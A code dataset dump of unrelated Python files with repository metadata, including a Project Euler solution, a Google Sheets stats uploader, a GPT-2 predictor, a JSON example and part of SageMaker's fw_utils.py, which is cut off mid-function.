KeyCurrencyAccount.key_uuid == key_uuid,
KeyCurrencyAccount.currency == account.currency,
KeyCurrencyAccount.account_uuid == ADMIN_UUID,
KeyCurrencyAccount.pending_admin_deposits == 0,
)
.populate_existing()
.with_for_update()
.one()
)
key_currency_account.account_uuid = account_uuid
self._add_new_key_account_commitment(
session,
key=key,
account_uuid=account_uuid,
deposits_will_be_credited_to_account_for_key=True,
)
session.commit()
| true
| true
|
1c3e9bc31b47a9334ee2b0d528b713b934e10f10
| 62
|
py
|
Python
|
Python_Code/PRs/num01_Natarajan_Lalgudi.py
|
abhiramr/ProjectEuler-Abhi
|
c86a964e5b2dbf79bc494d7d7d28ce7807504cd3
|
[
"MIT"
] | 2
|
2019-10-20T12:09:10.000Z
|
2021-02-13T05:51:08.000Z
|
Python_Code/PRs/num01_Natarajan_Lalgudi.py
|
abhiramr/ProjectEuler_Solutions
|
c86a964e5b2dbf79bc494d7d7d28ce7807504cd3
|
[
"MIT"
] | 1
|
2019-10-20T03:26:55.000Z
|
2019-10-20T03:26:55.000Z
|
Python_Code/PRs/num01_Natarajan_Lalgudi.py
|
abhiramr/ProjectEuler-Abhi
|
c86a964e5b2dbf79bc494d7d7d28ce7807504cd3
|
[
"MIT"
] | 9
|
2019-10-20T05:47:02.000Z
|
2019-10-20T06:06:03.000Z
|
lst = [x for x in range(1000) if (x%3==0 or x%5==0)]
sum(lst)
| 20.666667
| 52
| 0.564516
|
lst = [x for x in range(1000) if (x%3==0 or x%5==0)]
sum(lst)
| true
| true
|
1c3e9cb2bbe6ea1bde1164fb502cb7f3dd4932b0
| 2,290
|
py
|
Python
|
src/moderations/management/commands/send_stats_to_gspread.py
|
definitelysecure/shipwrecked
|
3b79c6df63ed3c271ccb1b8a21081c76bcd9f08a
|
[
"MIT"
] | null | null | null |
src/moderations/management/commands/send_stats_to_gspread.py
|
definitelysecure/shipwrecked
|
3b79c6df63ed3c271ccb1b8a21081c76bcd9f08a
|
[
"MIT"
] | null | null | null |
src/moderations/management/commands/send_stats_to_gspread.py
|
definitelysecure/shipwrecked
|
3b79c6df63ed3c271ccb1b8a21081c76bcd9f08a
|
[
"MIT"
] | null | null | null |
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from oauth2client import crypt
from django.core.management.base import BaseCommand
from django.utils import timezone
from moderation.settings import GOOGLE_DOCS_API_PRIVATE_KEY, GOOGLE_DOCS_API_SERVICE_ACCOUNT_EMAIL
from moderations.stats import get_leaderboard
from moderations.utils import timedelta_to_str
class Command(BaseCommand):
def handle(self, *args, **options):
def get_hour_fraction(timedelta_object):
"""
Convert seconds to hour fraction. i. e. 1 hour and 60 seconds are 1,016~ hours.
"""
hours = timedelta_object.days * 24
seconds = timedelta_object.seconds
fraction_of_hour = seconds / 3600.0
return hours + fraction_of_hour
leaderboard = get_leaderboard()
avg_time_first_mod_rev_all = get_hour_fraction(leaderboard['avg']['all_time']['review'][0])
avg_time_first_mod_rev_week = get_hour_fraction(leaderboard['avg']['seven_days']['review'][0])
avg_time_mod_res_all = get_hour_fraction(leaderboard['avg']['all_time']['resolution'][0])
avg_time_mod_res_week = get_hour_fraction(leaderboard['avg']['seven_days']['resolution'][0])
signer = crypt.Signer.from_string(GOOGLE_DOCS_API_PRIVATE_KEY)
scope = ['https://spreadsheets.google.com/feeds']
creds = ServiceAccountCredentials(GOOGLE_DOCS_API_SERVICE_ACCOUNT_EMAIL, signer, scopes=scope,
private_key_id=None, client_id=None, user_agent=None,
token_uri='https://www.googleapis.com/oauth2/v4/token',
revoke_uri='https://accounts.google.com/o/oauth2/revoke')
client = gspread.authorize(creds)
sheet = client.open('cv-mod-stats').sheet1
# The list of the values that stores the stats needed (should be in this order)
timestamp = timezone.now().strftime('%Y-%m-%d')
values = (timestamp,
avg_time_first_mod_rev_week, avg_time_first_mod_rev_all,
avg_time_mod_res_week, avg_time_mod_res_all)
# Insert at index 2 (index 1 is the header)
sheet.insert_row(values, 2)
| 44.901961
| 102
| 0.672926
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from oauth2client import crypt
from django.core.management.base import BaseCommand
from django.utils import timezone
from moderation.settings import GOOGLE_DOCS_API_PRIVATE_KEY, GOOGLE_DOCS_API_SERVICE_ACCOUNT_EMAIL
from moderations.stats import get_leaderboard
from moderations.utils import timedelta_to_str
class Command(BaseCommand):
def handle(self, *args, **options):
def get_hour_fraction(timedelta_object):
hours = timedelta_object.days * 24
seconds = timedelta_object.seconds
fraction_of_hour = seconds / 3600.0
return hours + fraction_of_hour
leaderboard = get_leaderboard()
avg_time_first_mod_rev_all = get_hour_fraction(leaderboard['avg']['all_time']['review'][0])
avg_time_first_mod_rev_week = get_hour_fraction(leaderboard['avg']['seven_days']['review'][0])
avg_time_mod_res_all = get_hour_fraction(leaderboard['avg']['all_time']['resolution'][0])
avg_time_mod_res_week = get_hour_fraction(leaderboard['avg']['seven_days']['resolution'][0])
signer = crypt.Signer.from_string(GOOGLE_DOCS_API_PRIVATE_KEY)
scope = ['https://spreadsheets.google.com/feeds']
creds = ServiceAccountCredentials(GOOGLE_DOCS_API_SERVICE_ACCOUNT_EMAIL, signer, scopes=scope,
private_key_id=None, client_id=None, user_agent=None,
token_uri='https://www.googleapis.com/oauth2/v4/token',
revoke_uri='https://accounts.google.com/o/oauth2/revoke')
client = gspread.authorize(creds)
sheet = client.open('cv-mod-stats').sheet1
timestamp = timezone.now().strftime('%Y-%m-%d')
values = (timestamp,
avg_time_first_mod_rev_week, avg_time_first_mod_rev_all,
avg_time_mod_res_week, avg_time_mod_res_all)
sheet.insert_row(values, 2)
| true
| true
|
1c3e9e2510a719d6ad1d93fce4df6c7e85a8f21a
| 906
|
py
|
Python
|
examples/pytorch/answer-generator/predictor.py
|
SSITB/cortex
|
cb9b64d466fedaceb1cb9171914ffb31409927fe
|
[
"Apache-2.0"
] | 1
|
2019-11-25T05:47:35.000Z
|
2019-11-25T05:47:35.000Z
|
examples/pytorch/answer-generator/predictor.py
|
SSITB/cortex
|
cb9b64d466fedaceb1cb9171914ffb31409927fe
|
[
"Apache-2.0"
] | null | null | null |
examples/pytorch/answer-generator/predictor.py
|
SSITB/cortex
|
cb9b64d466fedaceb1cb9171914ffb31409927fe
|
[
"Apache-2.0"
] | null | null | null |
import wget
import torch
from transformers import GPT2Tokenizer, GPT2LMHeadModel, GPT2Config
import generator
medium_config = GPT2Config(n_embd=1024, n_layer=24, n_head=16)
model = GPT2LMHeadModel(medium_config)
tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
def init(model_path, metadata):
wget.download(
"https://convaisharables.blob.core.windows.net/lsp/multiref/medium_ft.pkl", "medium_ft.pkl"
)
weights = torch.load("medium_ft.pkl")
weights["lm_head.weight"] = weights["lm_head.decoder.weight"]
weights.pop("lm_head.decoder.weight", None)
model.load_state_dict(weights)
model.eval()
model.to(metadata["device"])
def predict(sample, metadata):
conditioned_tokens = tokenizer.encode(sample["text"]) + [generator.END_OF_TEXT]
prediction = generator.generate(model, conditioned_tokens, metadata["device"])
return tokenizer.decode(prediction)
| 30.2
| 99
| 0.748344
|
import wget
import torch
from transformers import GPT2Tokenizer, GPT2LMHeadModel, GPT2Config
import generator
medium_config = GPT2Config(n_embd=1024, n_layer=24, n_head=16)
model = GPT2LMHeadModel(medium_config)
tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
def init(model_path, metadata):
wget.download(
"https://convaisharables.blob.core.windows.net/lsp/multiref/medium_ft.pkl", "medium_ft.pkl"
)
weights = torch.load("medium_ft.pkl")
weights["lm_head.weight"] = weights["lm_head.decoder.weight"]
weights.pop("lm_head.decoder.weight", None)
model.load_state_dict(weights)
model.eval()
model.to(metadata["device"])
def predict(sample, metadata):
conditioned_tokens = tokenizer.encode(sample["text"]) + [generator.END_OF_TEXT]
prediction = generator.generate(model, conditioned_tokens, metadata["device"])
return tokenizer.decode(prediction)
| true
| true
|
1c3e9e2c60ee00b4900a5d98d0339667c62cd6c3
| 1,165
|
py
|
Python
|
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyFormDataVersionTolerant/setup.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyFormDataVersionTolerant/setup.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
test/vanilla/version-tolerant/Expected/AcceptanceTests/BodyFormDataVersionTolerant/setup.py
|
cfculhane/autorest.python
|
8cbca95faee88d933a58bbbd17b76834faa8d387
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
NAME = "autorestswaggerbatformdataservice"
VERSION = "0.1.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.6.21", "azure-core<2.0.0,>=1.20.0"]
setup(
name=NAME,
version=VERSION,
description="AutoRestSwaggerBATFormDataService",
author_email="",
url="",
keywords=["Swagger", "AutoRestSwaggerBATFormDataService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Test Infrastructure for AutoRest Swagger BAT.
""",
)
| 30.657895
| 94
| 0.635193
|
from setuptools import setup, find_packages
NAME = "autorestswaggerbatformdataservice"
VERSION = "0.1.0"
REQUIRES = ["msrest>=0.6.21", "azure-core<2.0.0,>=1.20.0"]
setup(
name=NAME,
version=VERSION,
description="AutoRestSwaggerBATFormDataService",
author_email="",
url="",
keywords=["Swagger", "AutoRestSwaggerBATFormDataService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Test Infrastructure for AutoRest Swagger BAT.
""",
)
| true
| true
|
1c3e9fbeb5e1b10666670d451af1d807c912d958
| 419
|
py
|
Python
|
learn_python/json/json_read_write.py
|
Yeasmin-Tasnima/Python
|
eb172450c66bbc69133cd92290c4027cafef579f
|
[
"Apache-2.0"
] | null | null | null |
learn_python/json/json_read_write.py
|
Yeasmin-Tasnima/Python
|
eb172450c66bbc69133cd92290c4027cafef579f
|
[
"Apache-2.0"
] | null | null | null |
learn_python/json/json_read_write.py
|
Yeasmin-Tasnima/Python
|
eb172450c66bbc69133cd92290c4027cafef579f
|
[
"Apache-2.0"
] | null | null | null |
import json
book = {}
book['tom'] = {
'address': 'dhaka',
'phone': 1234
}
book['bob'] = {
'address': 'dinajpur',
'phone': 5678
}
s = json.dumps(book)
# writing
with open('book.txt', 'w') as f:
f.write(s)
# read json file as a string
f = open('book.txt', 'r')
book = f.read()
print(type(book))
print(book)
# read json file as a dictionary
book = json.loads(book)
print(type(book))
print(book)
| 13.516129
| 32
| 0.594272
|
import json
book = {}
book['tom'] = {
'address': 'dhaka',
'phone': 1234
}
book['bob'] = {
'address': 'dinajpur',
'phone': 5678
}
s = json.dumps(book)
with open('book.txt', 'w') as f:
f.write(s)
f = open('book.txt', 'r')
book = f.read()
print(type(book))
print(book)
book = json.loads(book)
print(type(book))
print(book)
| true
| true
|
1c3e9fcb412b8bde1a6852ee7411071417babf41
| 25,595
|
py
|
Python
|
src/sagemaker/fw_utils.py
|
ram-nadella/sagemaker-python-sdk
|
0ed415f96483f29c2c8b7a320bb825a993e116b2
|
[
"Apache-2.0"
] | 1
|
2020-11-20T14:48:24.000Z
|
2020-11-20T14:48:24.000Z
|
src/sagemaker/fw_utils.py
|
ram-nadella/sagemaker-python-sdk
|
0ed415f96483f29c2c8b7a320bb825a993e116b2
|
[
"Apache-2.0"
] | null | null | null |
src/sagemaker/fw_utils.py
|
ram-nadella/sagemaker-python-sdk
|
0ed415f96483f29c2c8b7a320bb825a993e116b2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""Utility methods used by framework classes"""
from __future__ import absolute_import
import logging
import os
import re
import shutil
import tempfile
from collections import namedtuple
import sagemaker.utils
from sagemaker import s3
from sagemaker.utils import get_ecr_image_uri_prefix, ECR_URI_PATTERN
logger = logging.getLogger("sagemaker")
_TAR_SOURCE_FILENAME = "source.tar.gz"
UploadedCode = namedtuple("UserCode", ["s3_prefix", "script_name"])
"""sagemaker.fw_utils.UserCode: An object containing the S3 prefix and script name.
This is for the source code used for the entry point with an ``Estimator``. It can be
instantiated with positional or keyword arguments.
"""
EMPTY_FRAMEWORK_VERSION_WARNING = (
"No framework_version specified, defaulting to version {}. "
"framework_version will be required in SageMaker Python SDK v2."
)
LATER_FRAMEWORK_VERSION_WARNING = (
"This is not the latest supported version. "
"If you would like to use version {latest}, "
"please add framework_version={latest} to your constructor."
)
PYTHON_2_DEPRECATION_WARNING = (
"{latest_supported_version} is the latest version of {framework} that supports "
"Python 2. Newer versions of {framework} will only be available for Python 3."
"Please set the argument \"py_version='py3'\" to use the Python 3 {framework} image."
)
PARAMETER_SERVER_MULTI_GPU_WARNING = (
"If you have selected a multi-GPU training instance type, "
"and have also enabled parameter server for distributed training. "
"Distributed training with the default parameter server configuration will not "
"fully leverage all GPU cores; the parameter server will be configured to run "
"only one worker per host regardless of the number of GPUs."
)
PARAMETER_V2_RENAME_WARNING = (
"Parameter {v1_parameter_name} will be renamed to {v2_parameter_name} "
"in SageMaker Python SDK v2."
)
EMPTY_FRAMEWORK_VERSION_ERROR = (
"framework_version is required for script mode estimator. "
"Please add framework_version={} to your constructor to avoid this error."
)
UNSUPPORTED_FRAMEWORK_VERSION_ERROR = (
"{} framework does not support version {}. Please use one of the following: {}."
)
VALID_PY_VERSIONS = ["py2", "py3", "py37"]
VALID_EIA_FRAMEWORKS = [
"tensorflow",
"tensorflow-serving",
"mxnet",
"mxnet-serving",
"pytorch-serving",
]
PY2_RESTRICTED_EIA_FRAMEWORKS = ["pytorch-serving"]
PY37_SUPPORTED_FRAMEWORKS = ["tensorflow-scriptmode"]
VALID_ACCOUNTS_BY_REGION = {
"us-gov-west-1": "246785580436",
"us-iso-east-1": "744548109606",
"cn-north-1": "422961961927",
"cn-northwest-1": "423003514399",
}
ASIMOV_VALID_ACCOUNTS_BY_REGION = {
"us-gov-west-1": "442386744353",
"us-iso-east-1": "886529160074",
"cn-north-1": "727897471807",
"cn-northwest-1": "727897471807",
}
OPT_IN_ACCOUNTS_BY_REGION = {"ap-east-1": "057415533634", "me-south-1": "724002660598"}
ASIMOV_OPT_IN_ACCOUNTS_BY_REGION = {"ap-east-1": "871362719292", "me-south-1": "217643126080"}
DEFAULT_ACCOUNT = "520713654638"
ASIMOV_PROD_ACCOUNT = "763104351884"
ASIMOV_DEFAULT_ACCOUNT = ASIMOV_PROD_ACCOUNT
SINGLE_GPU_INSTANCE_TYPES = ("ml.p2.xlarge", "ml.p3.2xlarge")
MERGED_FRAMEWORKS_REPO_MAP = {
"tensorflow-scriptmode": "tensorflow-training",
"tensorflow-serving": "tensorflow-inference",
"tensorflow-serving-eia": "tensorflow-inference-eia",
"mxnet": "mxnet-training",
"mxnet-serving": "mxnet-inference",
"mxnet-serving-eia": "mxnet-inference-eia",
"pytorch": "pytorch-training",
"pytorch-serving": "pytorch-inference",
"pytorch-serving-eia": "pytorch-inference-eia",
}
MERGED_FRAMEWORKS_LOWEST_VERSIONS = {
"tensorflow-scriptmode": {"py3": [1, 13, 1], "py2": [1, 14, 0], "py37": [1, 15, 2]},
"tensorflow-serving": [1, 13, 0],
"tensorflow-serving-eia": [1, 14, 0],
"mxnet": {"py3": [1, 4, 1], "py2": [1, 6, 0]},
"mxnet-serving": {"py3": [1, 4, 1], "py2": [1, 6, 0]},
"mxnet-serving-eia": [1, 4, 1],
"pytorch": [1, 2, 0],
"pytorch-serving": [1, 2, 0],
"pytorch-serving-eia": [1, 3, 1],
}
INFERENTIA_VERSION_RANGES = {
"neo-mxnet": [[1, 5, 1], [1, 5, 1]],
"neo-tensorflow": [[1, 15, 0], [1, 15, 0]],
}
INFERENTIA_SUPPORTED_REGIONS = ["us-east-1", "us-west-2"]
DEBUGGER_UNSUPPORTED_REGIONS = ["us-gov-west-1", "us-iso-east-1"]
def is_version_equal_or_higher(lowest_version, framework_version):
"""Determine whether the ``framework_version`` is equal to or higher than
``lowest_version``
Args:
lowest_version (List[int]): lowest version represented in an integer
list
framework_version (str): framework version string
Returns:
bool: Whether or not ``framework_version`` is equal to or higher than
``lowest_version``
"""
version_list = [int(s) for s in framework_version.split(".")]
return version_list >= lowest_version[0 : len(version_list)]
def is_version_equal_or_lower(highest_version, framework_version):
"""Determine whether the ``framework_version`` is equal to or lower than
``highest_version``
Args:
highest_version (List[int]): highest version represented in an integer
list
framework_version (str): framework version string
Returns:
bool: Whether or not ``framework_version`` is equal to or lower than
``highest_version``
"""
version_list = [int(s) for s in framework_version.split(".")]
return version_list <= highest_version[0 : len(version_list)]
def _is_dlc_version(framework, framework_version, py_version):
"""Return if the framework's version uses the corresponding DLC image.
Args:
framework (str): The framework name, e.g. "tensorflow-scriptmode"
framework_version (str): The framework version
py_version (str): The Python version, e.g. "py3"
Returns:
bool: Whether or not the framework's version uses the DLC image.
"""
lowest_version_list = MERGED_FRAMEWORKS_LOWEST_VERSIONS.get(framework)
if isinstance(lowest_version_list, dict):
lowest_version_list = lowest_version_list[py_version]
if lowest_version_list:
return is_version_equal_or_higher(lowest_version_list, framework_version)
return False
def _is_inferentia_supported(framework, framework_version):
"""Return if Inferentia supports the framework and its version.
Args:
framework (str): The framework name, e.g. "tensorflow"
framework_version (str): The framework version
Returns:
bool: Whether or not Inferentia supports the framework and its version.
"""
lowest_version_list = INFERENTIA_VERSION_RANGES.get(framework)[0]
highest_version_list = INFERENTIA_VERSION_RANGES.get(framework)[1]
return is_version_equal_or_higher(
lowest_version_list, framework_version
) and is_version_equal_or_lower(highest_version_list, framework_version)
def _registry_id(region, framework, py_version, account, framework_version):
"""Return the Amazon ECR registry number (or AWS account ID) for
the given framework, framework version, Python version, and region.
Args:
region (str): The AWS region.
framework (str): The framework name, e.g. "tensorflow-scriptmode".
py_version (str): The Python version, e.g. "py3".
account (str): The AWS account ID to use as a default.
framework_version (str): The framework version.
Returns:
str: The appropriate Amazon ECR registry number. If there is no
specific one for the framework, framework version, Python version,
and region, then ``account`` is returned.
"""
if _is_dlc_version(framework, framework_version, py_version):
if region in ASIMOV_OPT_IN_ACCOUNTS_BY_REGION:
return ASIMOV_OPT_IN_ACCOUNTS_BY_REGION.get(region)
if region in ASIMOV_VALID_ACCOUNTS_BY_REGION:
return ASIMOV_VALID_ACCOUNTS_BY_REGION.get(region)
return ASIMOV_DEFAULT_ACCOUNT
if region in OPT_IN_ACCOUNTS_BY_REGION:
return OPT_IN_ACCOUNTS_BY_REGION.get(region)
return VALID_ACCOUNTS_BY_REGION.get(region, account)
def create_image_uri(
region,
framework,
instance_type,
framework_version,
py_version=None,
account=None,
accelerator_type=None,
optimized_families=None,
):
"""Return the ECR URI of an image.
Args:
region (str): AWS region where the image is uploaded.
framework (str): framework used by the image.
instance_type (str): SageMaker instance type. Used to determine device
type (cpu/gpu/family-specific optimized).
framework_version (str): The version of the framework.
py_version (str): Optional. Python version. If specified, should be one
of 'py2' or 'py3'. If not specified, image uri will not include a
python component.
account (str): AWS account that contains the image. (default:
'520713654638')
accelerator_type (str): SageMaker Elastic Inference accelerator type.
optimized_families (str): Instance families for which there exist
specific optimized images.
Returns:
str: The appropriate image URI based on the given parameters.
"""
logger.warning(
"'create_image_uri' will be deprecated in favor of 'ImageURIProvider' class "
"in SageMaker Python SDK v2."
)
optimized_families = optimized_families or []
if py_version and py_version not in VALID_PY_VERSIONS:
raise ValueError("invalid py_version argument: {}".format(py_version))
if py_version == "py37" and framework not in PY37_SUPPORTED_FRAMEWORKS:
raise ValueError("{} does not support Python 3.7 at this time.".format(framework))
if _accelerator_type_valid_for_framework(
framework=framework,
py_version=py_version,
accelerator_type=accelerator_type,
optimized_families=optimized_families,
):
framework += "-eia"
# Handle account number for specific cases (e.g. GovCloud, opt-in regions, DLC images etc.)
if account is None:
account = _registry_id(
region=region,
framework=framework,
py_version=py_version,
account=DEFAULT_ACCOUNT,
framework_version=framework_version,
)
# Handle Local Mode
if instance_type.startswith("local"):
device_type = "cpu" if instance_type == "local" else "gpu"
elif not instance_type.startswith("ml."):
raise ValueError(
"{} is not a valid SageMaker instance type. See: "
"https://aws.amazon.com/sagemaker/pricing/instance-types/".format(instance_type)
)
else:
family = instance_type.split(".")[1]
# For some frameworks, we have optimized images for specific families, e.g c5 or p3.
# In those cases, we use the family name in the image tag. In other cases, we use
# 'cpu' or 'gpu'.
if family in optimized_families:
device_type = family
elif family.startswith("inf"):
device_type = "inf"
elif family[0] in ["g", "p"]:
device_type = "gpu"
else:
device_type = "cpu"
if device_type == "inf":
if region not in INFERENTIA_SUPPORTED_REGIONS:
raise ValueError(
"Inferentia is not supported in region {}. Supported regions are {}".format(
region, ", ".join(INFERENTIA_SUPPORTED_REGIONS)
)
)
if framework not in INFERENTIA_VERSION_RANGES:
raise ValueError(
"Inferentia does not support {}. Currently it supports "
"MXNet and TensorFlow with more frameworks coming soon.".format(
framework.split("-")[-1]
)
)
if not _is_inferentia_supported(framework, framework_version):
raise ValueError(
"Inferentia is not supported with {} version {}.".format(
framework.split("-")[-1], framework_version
)
)
use_dlc_image = _is_dlc_version(framework, framework_version, py_version)
if not py_version or (use_dlc_image and framework == "tensorflow-serving-eia"):
tag = "{}-{}".format(framework_version, device_type)
else:
tag = "{}-{}-{}".format(framework_version, device_type, py_version)
if use_dlc_image:
ecr_repo = MERGED_FRAMEWORKS_REPO_MAP[framework]
else:
ecr_repo = "sagemaker-{}".format(framework)
return "{}/{}:{}".format(get_ecr_image_uri_prefix(account, region), ecr_repo, tag)
def _accelerator_type_valid_for_framework(
framework, py_version, accelerator_type=None, optimized_families=None
):
"""
Args:
framework:
py_version:
accelerator_type:
optimized_families:
"""
if accelerator_type is None:
return False
if py_version == "py2" and framework in PY2_RESTRICTED_EIA_FRAMEWORKS:
raise ValueError(
"{} is not supported with Amazon Elastic Inference in Python 2.".format(framework)
)
if framework not in VALID_EIA_FRAMEWORKS:
raise ValueError(
"{} is not supported with Amazon Elastic Inference. Currently only "
"Python-based TensorFlow, MXNet, PyTorch are supported.".format(framework)
)
if optimized_families:
raise ValueError("Neo does not support Amazon Elastic Inference.")
if (
not accelerator_type.startswith("ml.eia")
and not accelerator_type == "local_sagemaker_notebook"
):
raise ValueError(
"{} is not a valid SageMaker Elastic Inference accelerator type. "
"See: https://docs.aws.amazon.com/sagemaker/latest/dg/ei.html".format(accelerator_type)
)
return True
def validate_source_dir(script, directory):
"""Validate that the source directory exists and it contains the user script
Args:
script (str): Script filename.
directory (str): Directory containing the source file.
Raises:
ValueError: If ``directory`` does not exist, is not a directory, or does
not contain ``script``.
"""
if directory:
if not os.path.isfile(os.path.join(directory, script)):
raise ValueError(
'No file named "{}" was found in directory "{}".'.format(script, directory)
)
return True
def tar_and_upload_dir(
session,
bucket,
s3_key_prefix,
script,
directory=None,
dependencies=None,
kms_key=None,
s3_resource=None,
):
"""Package source files and upload a compress tar file to S3. The S3
location will be ``s3://<bucket>/s3_key_prefix/sourcedir.tar.gz``.
If directory is an S3 URI, an UploadedCode object will be returned, but
nothing will be uploaded to S3 (this allow reuse of code already in S3).
If directory is None, the script will be added to the archive at
``./<basename of script>``.
If directory is not None, the (recursive) contents of the directory will
be added to the archive. directory is treated as the base path of the
archive, and the script name is assumed to be a filename or relative path
inside the directory.
Args:
session (boto3.Session): Boto session used to access S3.
bucket (str): S3 bucket to which the compressed file is uploaded.
s3_key_prefix (str): Prefix for the S3 key.
script (str): Script filename or path.
directory (str): Optional. Directory containing the source file. If it
starts with "s3://", no action is taken.
dependencies (List[str]): Optional. A list of paths to directories
(absolute or relative) containing additional libraries that will be
copied into /opt/ml/lib
kms_key (str): Optional. KMS key ID used to upload objects to the bucket
(default: None).
s3_resource (boto3.resource("s3")): Optional. Pre-instantiated Boto3 Resource
for S3 connections, can be used to customize the configuration,
e.g. set the endpoint URL (default: None).
Returns:
sagemaker.fw_utils.UserCode: An object with the S3 bucket and key (S3 prefix) and
script name.
"""
if directory and directory.lower().startswith("s3://"):
return UploadedCode(s3_prefix=directory, script_name=os.path.basename(script))
script_name = script if directory else os.path.basename(script)
dependencies = dependencies or []
key = "%s/sourcedir.tar.gz" % s3_key_prefix
tmp = tempfile.mkdtemp()
try:
source_files = _list_files_to_compress(script, directory) + dependencies
tar_file = sagemaker.utils.create_tar_file(
source_files, os.path.join(tmp, _TAR_SOURCE_FILENAME)
)
if kms_key:
extra_args = {"ServerSideEncryption": "aws:kms", "SSEKMSKeyId": kms_key}
else:
extra_args = None
if s3_resource is None:
s3_resource = session.resource("s3", region_name=session.region_name)
else:
print("Using provided s3_resource")
s3_resource.Object(bucket, key).upload_file(tar_file, ExtraArgs=extra_args)
finally:
shutil.rmtree(tmp)
return UploadedCode(s3_prefix="s3://%s/%s" % (bucket, key), script_name=script_name)
def _list_files_to_compress(script, directory):
"""
Args:
script:
directory:
"""
if directory is None:
return [script]
basedir = directory if directory else os.path.dirname(script)
return [os.path.join(basedir, name) for name in os.listdir(basedir)]
def framework_name_from_image(image_name):
# noinspection LongLine
"""Extract the framework and Python version from the image name.
Args:
image_name (str): Image URI, which should be one of the following forms:
legacy:
'<account>.dkr.ecr.<region>.amazonaws.com/sagemaker-<fw>-<py_ver>-<device>:<container_version>'
legacy:
'<account>.dkr.ecr.<region>.amazonaws.com/sagemaker-<fw>-<py_ver>-<device>:<fw_version>-<device>-<py_ver>'
current:
'<account>.dkr.ecr.<region>.amazonaws.com/sagemaker-<fw>:<fw_version>-<device>-<py_ver>'
current:
'<account>.dkr.ecr.<region>.amazonaws.com/sagemaker-rl-<fw>:<rl_toolkit><rl_version>-<device>-<py_ver>'
Returns:
tuple: A tuple containing:
str: The framework name str: The Python version str: The image tag
str: If the image is script mode
"""
sagemaker_pattern = re.compile(ECR_URI_PATTERN)
sagemaker_match = sagemaker_pattern.match(image_name)
if sagemaker_match is None:
return None, None, None, None
# extract framework, python version and image tag
# We must support both the legacy and current image name format.
name_pattern = re.compile(
r"^(?:sagemaker(?:-rl)?-)?(tensorflow|mxnet|chainer|pytorch|scikit-learn|xgboost)(?:-)?(scriptmode|training)?:(.*)-(.*?)-(py2|py3)$" # noqa: E501 # pylint: disable=line-too-long
)
legacy_name_pattern = re.compile(r"^sagemaker-(tensorflow|mxnet)-(py2|py3)-(cpu|gpu):(.*)$")
name_match = name_pattern.match(sagemaker_match.group(9))
legacy_match = legacy_name_pattern.match(sagemaker_match.group(9))
if name_match is not None:
fw, scriptmode, ver, device, py = (
name_match.group(1),
name_match.group(2),
name_match.group(3),
name_match.group(4),
name_match.group(5),
)
return fw, py, "{}-{}-{}".format(ver, device, py), scriptmode
if legacy_match is not None:
return (legacy_match.group(1), legacy_match.group(2), legacy_match.group(4), None)
return None, None, None, None
def framework_version_from_tag(image_tag):
"""Extract the framework version from the image tag.
Args:
image_tag (str): Image tag, which should take the form
'<framework_version>-<device>-<py_version>'
Returns:
str: The framework version.
"""
tag_pattern = re.compile("^(.*)-(cpu|gpu)-(py2|py3)$")
tag_match = tag_pattern.match(image_tag)
return None if tag_match is None else tag_match.group(1)
def parse_s3_url(url):
"""Calls the method with the same name in the s3 module.
:func:~sagemaker.s3.parse_s3_url
Args:
url: A URL, expected with an s3 scheme.
Returns: The return value of s3.parse_s3_url, which is a tuple containing:
str: S3 bucket name str: S3 key
"""
return s3.parse_s3_url(url)
def model_code_key_prefix(code_location_key_prefix, model_name, image):
"""Returns the s3 key prefix for uploading code during model deployment
The location returned is a potential concatenation of 2 parts
1. code_location_key_prefix if it exists
2. model_name or a name derived from the image
Args:
code_location_key_prefix (str): the s3 key prefix from code_location
model_name (str): the name of the model
image (str): the image from which a default name can be extracted
Returns:
str: the key prefix to be used in uploading code
"""
training_job_name = sagemaker.utils.name_from_image(image)
return "/".join(filter(None, [code_location_key_prefix, model_name or training_job_name]))
def empty_framework_version_warning(default_version, latest_version):
"""
Args:
default_version:
latest_version:
"""
msgs = [EMPTY_FRAMEWORK_VERSION_WARNING.format(default_version)]
if default_version != latest_version:
msgs.append(later_framework_version_warning(latest_version))
return " ".join(msgs)
def later_framework_version_warning(latest_version):
"""
Args:
latest_version:
"""
return LATER_FRAMEWORK_VERSION_WARNING.format(latest=latest_version)
def warn_if_parameter_server_with_multi_gpu(training_instance_type, distributions):
"""Warn the user that training will not fully leverage all the GPU
cores if parameter server is enabled and a multi-GPU instance is selected.
Distributed training with the default parameter server setup doesn't
support multi-GPU instances.
Args:
training_instance_type (str): A string representing the type of training instance selected.
distributions (dict): A dictionary with information to enable distributed training.
(Defaults to None if distributed training is not enabled.) For example:
.. code:: python
{
'parameter_server':
{
'enabled': True
}
}
"""
if training_instance_type == "local" or distributions is None:
return
is_multi_gpu_instance = (
training_instance_type == "local_gpu"
or training_instance_type.split(".")[1].startswith("p")
) and training_instance_type not in SINGLE_GPU_INSTANCE_TYPES
ps_enabled = "parameter_server" in distributions and distributions["parameter_server"].get(
